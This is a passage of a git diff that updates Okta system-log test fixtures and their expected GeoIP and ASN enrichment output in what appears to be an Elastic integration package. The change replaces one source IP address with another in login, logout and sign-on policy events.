"{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" + "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" }, { - "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" + "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" } ] } \ No newline at end of file diff --git a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json index 0775b72e9ec..4c6d7c3f506 100644 --- a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json +++ b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json @@ -3,28 +3,27 @@ { "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Dublin", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -121.919, - "lat": 37.7201 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "user": { "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" @@ -38,7 +37,7 @@ "xxxxxx" ], "ip": [ - "108.255.197.247" + "175.16.199.1" ] }, "client": { @@ -55,11 +54,11 @@ "full_name": "xxxxxx", "id": "00u1abvz4pYqdM8ms4x6" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "event": { - "ingested": "2021-06-14T07:17:41.693715800Z", - "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 